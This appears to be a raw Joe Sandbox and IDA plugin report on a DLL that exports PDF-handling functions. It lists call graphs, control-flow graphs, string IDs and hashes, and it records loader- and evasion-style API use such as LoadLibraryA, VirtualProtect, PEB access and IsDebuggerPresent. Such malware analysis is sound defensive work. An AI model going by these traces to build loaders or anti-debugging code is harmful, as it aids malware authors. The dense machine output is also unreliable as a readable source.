10962->10964 10965 6cbd4670 10966 6cbd4691 FPDFPageObj_GetType 10965->10966 10967 6cbd46a3 10965->10967 10966->10967 11603 6cbd1770 11604 6cbd178d 11603->11604 11605 6cbc56ef 5 API calls 11604->11605 11606 6cbd17b1 11604->11606 11607 6cbd19bd 11605->11607 11607->11606 11608 6caf7104 GetPEB 11607->11608 11608->11606 10968 6cbf2270 10969 6cbf227b 10968->10969 10970 6cbf22c1 10968->10970 10972 6cbf2297 10969->10972 10973 6cbf2288 VirtualFree 10969->10973 11021 6cbefd00 10970->11021 10988 6cbf19f0 VirtualAlloc 10972->10988 10975 6cbf22b7 10973->10975 10989 6cbf1a1a 10988->10989 10993 6cbf1c52 10988->10993 10990 6cbf1a38 GetLastError 10989->10990 10989->10993 10991 6cbf1a49 10990->10991 10992 6cbf1a54 Sleep VirtualAlloc 10990->10992 10991->10992 10991->10993 10992->10993 10994 6cbf1a72 GetLastError 10992->10994 10993->10975 10995 6cbf1a8e Sleep VirtualAlloc 10994->10995 10996 6cbf1a83 10994->10996 10995->10993 10997 6cbf1aac GetLastError 10995->10997 10996->10993 10996->10995 10998 6cbf1abd 10997->10998 10999 6cbf1ac8 Sleep VirtualAlloc 10997->10999 10998->10993 10998->10999 10999->10993 11000 6cbf1ae6 GetLastError 10999->11000 11001 6cbf1af7 11000->11001 11002 6cbf1b02 Sleep VirtualAlloc 11000->11002 11001->10993 11001->11002 11002->10993 11003 6cbf1b20 GetLastError 11002->11003 11004 6cbf1b3c Sleep VirtualAlloc 11003->11004 11005 6cbf1b31 11003->11005 11004->10993 11006 6cbf1b5a GetLastError 11004->11006 11005->10993 11005->11004 11007 6cbf1b6b 11006->11007 11008 6cbf1b76 Sleep VirtualAlloc 11006->11008 11007->10993 11007->11008 11008->10993 11009 6cbf1b94 GetLastError 11008->11009 11010 6cbf1ba5 11009->11010 11011 6cbf1bb0 Sleep VirtualAlloc 11009->11011 11010->10993 11010->11011 11011->10993 11012 6cbf1bce GetLastError 11011->11012 11013 6cbf1bdf 11012->11013 11014 6cbf1be6 Sleep VirtualAlloc 11012->11014 11013->10993 11013->11014 11014->10993 11015 6cbf1c00 GetLastError 11014->11015 11016 6cbf1c18 Sleep VirtualAlloc 11015->11016 11017 6cbf1c11 11015->11017 11016->10993 11018 6cbf1c32 GetLastError 11016->11018 11017->10993 11017->11016 11019 6cbf1c4a Sleep 11018->11019 11020 6cbf1c43 11018->11020 11019->10993 11020->10993 11020->11019 11024 6cbf0310 11021->11024 11023 6cbefd0d 11025 6cbf038c 11024->11025 11026 6cbf032a 11024->11026 11025->11023 11026->11025 11027 6cbf0335 lstrlenA GetStdHandle 11026->11027 11028 6cbf0350 11027->11028 11029 6cbf037b 11028->11029 11030 6cbf0354 WriteFile 11028->11030 11029->11025 11031 6cbf039e GetStdHandle 11029->11031 11030->11028 11030->11029 11032 6cbf03b0 11031->11032 11032->11025 11033 6cbf03b8 WriteFile 11032->11033 11033->11025 11033->11032 10891 6cbce2e0 FPDFAnnot_HasKey 10892 6cbce307 10891->10892 10893 6cbccee0 10894 6cbccf18 10893->10894 10895 6cbcceea FPDFAnnot_GetSubtype 10893->10895 10895->10894 11246 6cbcffe0 11247 6cbcfffd 11246->11247 11248 6cbc56ef 5 API calls 11247->11248 11249 6cbd001d 11247->11249 11248->11249 11609 6cbcd760 FPDFAnnot_HasAttachmentPoints 11610 6cbcd7b3 11609->11610 11611 6cbcd783 11609->11611 11611->11610 11612 6cbcd7f0 FPDFAnnot_HasAttachmentPoints 11611->11612 11613 6cbcd863 11612->11613 11614 6cbcd818 11612->11614 11614->11613 11615 6cbcd914 FPDFAnnot_HasAttachmentPoints 11614->11615 11615->11613 10896 6cbd04e0 10897 6cbd04ff 10896->10897 10898 6cbd0581 10896->10898 10897->10898 10899 6cbd05b0 FPDFAttachment_HasKey 10897->10899 11034 6cbd2460 11035 6cbd2480 11034->11035 11038 6cbd25bb 11034->11038 11036 6cbd248a FPDFPageObj_GetType 11035->11036 11035->11038 11036->11038 11042 6cbd249d 11036->11042 11037 6cb2ced8 GetPEB 11037->11042 11039 6cbd2620 FPDFPageObj_GetType 11041 6cbd2648 11039->11041 11040 6cbd25b7 11040->11038 11040->11039 11042->11037 11042->11038 11042->11040 11043 6cbd2860 FPDFPageObj_GetType 11044 6cbd2884 11043->11044 11046 6cbd28ed 11043->11046 11045 6cb2cdf4 GetPEB 11044->11045 11044->11046 11045->11046 11250 6cbcb5d0 FPDFPageObj_GetType 11251 6cbcb5f8 11250->11251 11051 6cbd2050 11052 6cbd206e 11051->11052 11054 6cbd20b9 11051->11054 11053 6cbd20e0 11052->11053 11059 6cbd207a 11052->11059 11055 6cbd218e FPDFPageObj_GetType 11053->11055 11056 6cbd214a 11053->11056 11058 6cbd2117 11053->11058 11062 6cbd21c5 11055->11062 11061 6cb54e3e GetPEB 11058->11061 11063 6cb54d82 11059->11063 11061->11056 11064 6cb54d9f 11063->11064 11066 6cb54db0 11063->11066 11065 6cb2cdf4 GetPEB 11064->11065 11065->11066 11066->11054 11069 6cbda450 11071 6cbda46f 11069->11071 11070 6cbda553 11071->11070 11072 6cbda65d FPDFPageObj_GetType 11071->11072 11073 6cbda68a 11072->11073 11074 6cbd1e50 FPDFAction_GetType 11075 6cbd1e74 11074->11075 11076 6cbd1f2a FPDFAction_GetType 11075->11076 11080 6cbd1edb 11075->11080 11077 6cbd1f3d 11076->11077 11076->11080 11078 6cbd207a 11077->11078 11079 6cbd20e0 11077->11079 11077->11080 11085 6cb54d82 GetPEB 11078->11085 11081 6cbd218e FPDFPageObj_GetType 11079->11081 11082 6cbd214a 11079->11082 11084 6cbd2117 11079->11084 11087 6cbd21c5 11081->11087 11086 6cb54e3e GetPEB 11084->11086 11085->11080 11086->11082 11254 6cbd1fd0 11255 6cbd1ff0 11254->11255 11256 6cbd20e0 11255->11256 11260 6cbd207a 11255->11260 11263 6cbd202d 11255->11263 11257 6cbd218e FPDFPageObj_GetType 11256->11257 11258 6cbd2117 11256->11258 11264 6cbd214a 11256->11264 11265 6cbd21c5 11257->11265 11262 6cb54e3e GetPEB 11258->11262 11261 6cb54d82 GetPEB 11260->11261 11261->11263 11262->11264 11618 6cbf5550 11619 6cbf5570 11618->11619 11620 6cbf55b1 11619->11620 11622 6cbf3c50 11619->11622 11623 6cbf3d0f 11622->11623 11624 6cbf3c6c 11622->11624 11623->11619 11624->11623 11626 6cbf21e0 VirtualFree 11624->11626 11627 6cbf220c GetLastError 11626->11627 11628 6cbf2240 11626->11628 11627->11628 11629 6cbf2216 11627->11629 11628->11623 11633 6cbefc80 11629->11633 11631 6cbf2232 11636 6cbefce0 11631->11636 11652 6cbefd20 11633->11652 11635 6cbefc97 11635->11631 11637 6cbefcec 11636->11637 11640 6cbefcf2 11636->11640 11679 6cbeff50 FormatMessageA 11637->11679 11639 6cbf0225 11682 6cbefe40 11639->11682 11641 6cbf0310 5 API calls 11640->11641 11645 6cbeff20 11640->11645 11642 6cbefed0 11641->11642 11642->11645 11658 6cbf1070 RtlCaptureStackBackTrace 11642->11658 11644 6cbf0244 11644->11628 11651 6cbeff4b 11645->11651 11677 6cbf1640 SetLastError 11645->11677 11648 6cbeff16 11659 6cbf1090 11648->11659 11649 6cbeff36 11649->11628 11655 6cbf1610 11652->11655 11654 6cbefd5a 11654->11635 11656 6cbf161b 11655->11656 11657 6cbf1624 GetLastError SetLastError 11656->11657 11657->11654 11658->11648 11660 6cbf10a0 11659->11660 11693 6cbf1500 GetCurrentProcessId 11660->11693 11678 6cbf1656 11677->11678 11678->11649 11680 6cbf0127 GetLastError 11679->11680 11681 6cbf00a0 11679->11681 11680->11681 11681->11639 11683 6cbefe6a 11682->11683 11684 6cbf0310 5 API calls 11683->11684 11686 6cbeff20 11683->11686 11685 6cbefed0 11684->11685 11685->11686 11694 6cbf1070 RtlCaptureStackBackTrace 11685->11694 11688 6cbf1640 SetLastError 11686->11688 11692 6cbeff4b 11686->11692 11690 6cbeff36 11688->11690 11689 6cbeff16 11691 6cbf1090 14 API calls 11689->11691 11690->11644 11691->11686 11694->11689 10767 6caf8856 10773 6caf88aa 10767->10773 10768 6caf91dc CreateFileW 10775 6caf9262 10768->10775 10769 6caf9ef3 ReadFile 10776 6caf9f8b 10769->10776 10770 6cafac30 LoadLibraryA VirtualProtect 10777 6caf6ce6 10770->10777 10773->10768 10774 6caf98a8 10775->10769 10775->10774 10776->10770 10778 6caf6cfb VirtualProtect 10777->10778 10778->10774 11088 6cbcdc40 11091 6cbcdcb6 FPDFAnnot_GetSubtype 11088->11091 11090 6cbcdc66 11092 6cbcdcdb 11091->11092 11092->11090 10906 6cbd32c0 10907 6cbd32e0 10906->10907 10908 6cbd32ed FPDFPageObj_GetType 10907->10908 10909 6cbd3323 10907->10909 10908->10909 11695 6cbd1d40 11696 6cbd1d59 11695->11696 11697 6cbd1d95 11695->11697 11696->11697 11698 6cbd1dd6 FPDFAction_GetType 11696->11698 11698->11697
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $ $!$!$!$!$!$$$$$$$$$$$$$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$)$)$)$)$)$+$+$+$+$+$2$2$2$2$2$7$7$7$7$7$7$:$:$:$:$:$:$:$:$:$:$:$<$<$<$<$<$D$D$D$D$D$D$D$D$D$D$D$F$F$F$F$F$F$I$I$I$I$I$L$L$L$L$L$M$M$M$M$M$N$N$N$N$N$O$O$O$O$O$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$U$U$U$U$U$U$U$U$U$U$U$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$[$[$[$[$[$[$^$^$^$^$^$a$a$a$a$a
                                                                                                        • API String ID: 0-4199791830
                                                                                                        • Opcode ID: 6623bf9b8a6f73182f1492c0edafe1c969829831fcc36c917dabe8366a0b8775
                                                                                                        • Instruction ID: 0d91312a321aaf920dbd97a0af6a6ded3b26f1bfbe8c4d43eef580a8493ba579
                                                                                                        • Opcode Fuzzy Hash: 6623bf9b8a6f73182f1492c0edafe1c969829831fcc36c917dabe8366a0b8775
                                                                                                        • Instruction Fuzzy Hash: A043F074D08269CFCB24CFA8C994BDDBBB1BF09308F04419AE429AB711D7759A86CF15

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1223 6cbd2330-6cbd234a 1224 6cbd23d7-6cbd23ea call 6cd2b4d8 1223->1224 1225 6cbd2350-6cbd235d call 6cbc5650 1223->1225 1225->1224 1230 6cbd235f-6cbd236c 1225->1230 1231 6cbd236e-6cbd2395 call 6cb4e14c call 6cb67b1e call 6cb00cf2 1230->1231 1232 6cbd23eb-6cbd2409 1230->1232 1256 6cbd23cf-6cbd23d2 call 6cb00cf2 1231->1256 1257 6cbd2397-6cbd23ab call 6cb67b7e 1231->1257 1236 6cbd240b-6cbd2418 1232->1236 1237 6cbd2445 1232->1237 1240 6cbd245b-6cbd247a 1236->1240 1241 6cbd241a-6cbd2443 call 6cb4e14c call 6cb67b7e call 6cb00cf2 * 2 1236->1241 1239 6cbd2447-6cbd245a call 6cd2b4d8 1237->1239 1246 6cbd2600-6cbd2613 call 6cd2b4d8 1240->1246 1247 6cbd2480-6cbd2484 1240->1247 1241->1239 1247->1246 1251 6cbd248a-6cbd2497 FPDFPageObj_GetType 1247->1251 1251->1246 1255 6cbd249d-6cbd24b2 call 6cb19ad6 1251->1255 1268 6cbd24b8-6cbd24c5 1255->1268 1269 6cbd25bb-6cbd25bd 1255->1269 1256->1224 1270 6cbd23ad-6cbd23c3 call 6cb4e328 call 6cb00cf2 1257->1270 1271 6cbd23c5 1257->1271 1274 6cbd25bf-6cbd25c8 1268->1274 1275 6cbd24cb-6cbd24dc call 6cb2ced8 1268->1275 1273 6cbd25fd 1269->1273 1277 6cbd23c7-6cbd23ca call 6cb00cf2 1270->1277 1271->1277 1273->1246 1279 6cbd25da-6cbd25df 1274->1279 1288 6cbd25a2-6cbd25b1 1275->1288 1289 6cbd24e2-6cbd24f7 1275->1289 1277->1256 1284 6cbd261d-6cbd2646 FPDFPageObj_GetType 1279->1284 1285 6cbd25e1-6cbd25e5 1279->1285 1291 6cbd2648-6cbd2651 1284->1291 1292 6cbd2695-6cbd26a8 call 6cd2b4d8 1284->1292 1285->1273 1286 6cbd25e7-6cbd25fb 1285->1286 1286->1273 1288->1275 1293 6cbd25b7-6cbd25b9 1288->1293 1313 6cbd24f9-6cbd24fc 1289->1313 1314 6cbd2502-6cbd2507 1289->1314 1295 6cbd26a9-6cbd26ca 1291->1295 1296 6cbd2653-6cbd2655 1291->1296 1299 6cbd25cf-6cbd25d8 1293->1299 1306 6cbd270d-6cbd2720 call 6cd2b4d8 1295->1306 1307 6cbd26cc-6cbd26d0 1295->1307 1300 6cbd267c-6cbd2681 1296->1300 1301 6cbd2657-6cbd267a call 6cbc5650 call 6cd2b400 call 6cb00aa4 1296->1301 1299->1273 1299->1279 1300->1292 1308 6cbd2683-6cbd2691 1300->1308 1301->1292 1307->1306 1312 6cbd26d2-6cbd270c call 6caf152c call 6cb353ce call 6cbc5933 call 6caf1802 1307->1312 1308->1292 1312->1306 1313->1314 1315 6cbd2617-6cbd2618 1313->1315 1316 6cbd250d-6cbd2511 1314->1316 1317 6cbd2614-6cbd2615 1314->1317 1322 6cbd261a-6cbd261b 1315->1322 1323 6cbd2527-6cbd2529 1316->1323 1324 6cbd2513-6cbd2522 1316->1324 1317->1315 1322->1284 1323->1288 1327 6cbd252b-6cbd2569 call 6caf152c call 6cb34d50 call 6caf1d12 call 6caf1802 * 2 1323->1327 1324->1323 1347 6cbd2578-6cbd257d 1327->1347 1348 6cbd256b-6cbd2576 1327->1348 1347->1322 1349 6cbd2583-6cbd2587 1347->1349 1348->1347 1350 6cbd259e-6cbd25a0 1349->1350 1351 6cbd2589-6cbd259b 1349->1351 1350->1288 1352 6cbd25ca-6cbd25cc 1350->1352 1351->1350 1352->1299
                                                                                                        APIs
                                                                                                        • FPDFPageObj_GetType.IEPDF32(?), ref: 6CBD248D
                                                                                                        • FPDFPageObj_GetType.IEPDF32(?,?,?), ref: 6CBD263A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Obj_PageType
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1809354570-3862875103
                                                                                                        • Opcode ID: ea08ca40545f0128bf0db6a39c222a6df8c7dfd8bed8326e669f03cbc182055e
                                                                                                        • Instruction ID: caf8dffb94394cf0afb2fd8b94f98bd7a6e1c6e47b6bb348c094241b482df0e1
                                                                                                        • Opcode Fuzzy Hash: ea08ca40545f0128bf0db6a39c222a6df8c7dfd8bed8326e669f03cbc182055e
                                                                                                        • Instruction Fuzzy Hash: 08C1F571B002999FDF14CF68C8949BFB7B5EF49618B010429E9166BB41DB30FD09CBA2

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1355 6cbcd760-6cbcd781 FPDFAnnot_HasAttachmentPoints 1356 6cbcd7d3 1355->1356 1357 6cbcd783-6cbcd79d call 6cbc5714 1355->1357 1358 6cbcd7d5-6cbcd7e8 call 6cd2b4d8 1356->1358 1357->1356 1363 6cbcd79f-6cbcd7b1 1357->1363 1364 6cbcd7e9-6cbcd816 FPDFAnnot_HasAttachmentPoints 1363->1364 1365 6cbcd7b3-6cbcd7bd 1363->1365 1368 6cbcd818-6cbcd81a 1364->1368 1369 6cbcd882-6cbcd895 call 6cd2b4d8 1364->1369 1365->1358 1366 6cbcd7bf-6cbcd7d1 1365->1366 1366->1358 1368->1369 1372 6cbcd81c-6cbcd838 call 6cbc5714 1368->1372 1377 6cbcd87d 1372->1377 1378 6cbcd83a-6cbcd85a call 6cbc583f 1372->1378 1379 6cbcd87f 1377->1379 1378->1379 1382 6cbcd85c-6cbcd861 1378->1382 1379->1369 1383 6cbcd896-6cbcd8ba 1382->1383 1384 6cbcd863-6cbcd867 1382->1384 1387 6cbcd94b-6cbcd95e call 6cd2b4d8 1383->1387 1388 6cbcd8c0-6cbcd8c5 1383->1388 1384->1379 1386 6cbcd869-6cbcd87b 1384->1386 1386->1379 1388->1387 1391 6cbcd8cb-6cbcd8d2 1388->1391 1393 6cbcd8d8-6cbcd8dd 1391->1393 1394 6cbcda84-6cbcda85 1391->1394 1395 6cbcd8df-6cbcd91f call 6cbc5933 call 6caf152c call 6cb35942 call 6caf1802 FPDFAnnot_HasAttachmentPoints 1393->1395 1396 6cbcd931 1393->1396 1397 6cbcda87-6cbcda88 1394->1397 1422 6cbcd95f-6cbcd978 call 6cb4f607 1395->1422 1423 6cbcd921-6cbcd926 1395->1423 1401 6cbcd933-6cbcd937 1396->1401 1400 6cbcda8a-6cbcda8b 1397->1400 1403 6cbcda8d-6cbcda8e 1400->1403 1401->1387 1404 6cbcd939-6cbcd947 1401->1404 1406 6cbcda90-6cbcdabb 1403->1406 1404->1387 1411 6cbcdabd-6cbcdac2 1406->1411 1412 6cbcdb06-6cbcdb19 call 6cd2b4d8 1406->1412 1411->1412 1415 6cbcdac4-6cbcdac9 1411->1415 1415->1412 1418 6cbcdacb-6cbcdb05 call 6caf152c call 6cb353ce call 6cbc5933 call 6caf1802 1415->1418 1418->1412 1422->1423 1430 6cbcd97a-6cbcd9c2 call 6cb3cf68 call 6caf152c call 6cb353ce call 6caf4d40 call 6caf1802 1422->1430 1423->1397 1426 6cbcd92c-6cbcd92f 1423->1426 1426->1401 1444 6cbcd9e9-6cbcd9ed 1430->1444 1445 6cbcd9c4-6cbcd9c9 1430->1445 1447 6cbcd9ef-6cbcda29 call 6cb3cf68 call 6caf152c call 6cb35942 call 6caf1802 1444->1447 1448 6cbcda4a-6cbcda56 1444->1448 1445->1400 1446 6cbcd9cf-6cbcd9d3 1445->1446 1446->1444 1449 6cbcd9d5-6cbcd9e4 1446->1449 1447->1448 1464 6cbcda2b-6cbcda30 1447->1464 1448->1423 1450 6cbcda5c-6cbcda61 1448->1450 1449->1444 1450->1403 1452 6cbcda63-6cbcda67 1450->1452 1452->1423 1455 6cbcda6d-6cbcda7f 1452->1455 1455->1423 1464->1406 1465 6cbcda32-6cbcda36 1464->1465 1465->1448 1466 6cbcda38-6cbcda46 1465->1466 1466->1448
                                                                                                        APIs
                                                                                                        • FPDFAnnot_HasAttachmentPoints.IEPDF32(?), ref: 6CBCD777
                                                                                                          • Part of subcall function 6CBCCEE0: FPDFAnnot_GetSubtype.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6CBCCEEB
                                                                                                        • FPDFAnnot_HasAttachmentPoints.IEPDF32(?), ref: 6CBCD80A
                                                                                                        • FPDFAnnot_HasAttachmentPoints.IEPDF32(00000000,?,?,Rect), ref: 6CBCD915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Annot_$AttachmentPoints$Subtype
                                                                                                        • String ID: BBox$Rect
                                                                                                        • API String ID: 2680163206-3854271352
                                                                                                        • Opcode ID: b119691c816e1f4ebd9c458605a8cb1a045d2da63aea69b77b9c68d9da403d24
                                                                                                        • Instruction ID: 50476ec39eb9d7ab882086bc002ca4d72f728544c22adee822677a844abc5f0c
                                                                                                        • Opcode Fuzzy Hash: b119691c816e1f4ebd9c458605a8cb1a045d2da63aea69b77b9c68d9da403d24
                                                                                                        • Instruction Fuzzy Hash: 8AC1FA79B012499FDB10CF75D980AAE77B5FF89708F10051CE919ABB40DB70E909C7A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Annot$Type
                                                                                                        • API String ID: 0-395718979
                                                                                                        • Opcode ID: cf1b1e30d527158db2ca3673770b9bc7bfdb50fa83a3c54889d2e7082862c3bc
                                                                                                        • Instruction ID: 20f02797c642adaebfe8ab236cd19591a72d4400f596dc52749d2af939afeb15
                                                                                                        • Opcode Fuzzy Hash: cf1b1e30d527158db2ca3673770b9bc7bfdb50fa83a3c54889d2e7082862c3bc
                                                                                                        • Instruction Fuzzy Hash: 80B1D675B00258CFEB14CF65C9817AEB7B5FF89704F008859D919AB740EB309D0ACB92
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 6CD4A8CE
